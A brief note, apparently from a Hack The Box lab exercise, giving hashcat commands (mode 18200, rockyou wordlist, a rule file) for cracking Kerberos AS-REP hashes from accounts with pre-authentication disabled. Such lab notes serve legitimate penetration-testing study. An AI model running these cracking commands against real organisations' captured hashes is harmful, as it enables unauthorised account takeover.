Skip to main content

hashcat to decrypt $krb5asrep$23$jsmith@SCRM.LOCAL: | kerberos | pre-auth disabled

C:\HTB\hashcat510>hashcat64 -m 18200 -a 0 "encrypted data or hash value"

 


on linux:

hashcat -m 18200 hashes/sauna /usr/share/wordlists/rockyou.txt 

or

./hashcat -m 18200 hashes/sauna /usr/share/wordlists/rockyou.txt rules/InsidePro-PasswordsPro.rule
 
hashes is the directory and sauna is the file where we kept the hash. 


Comments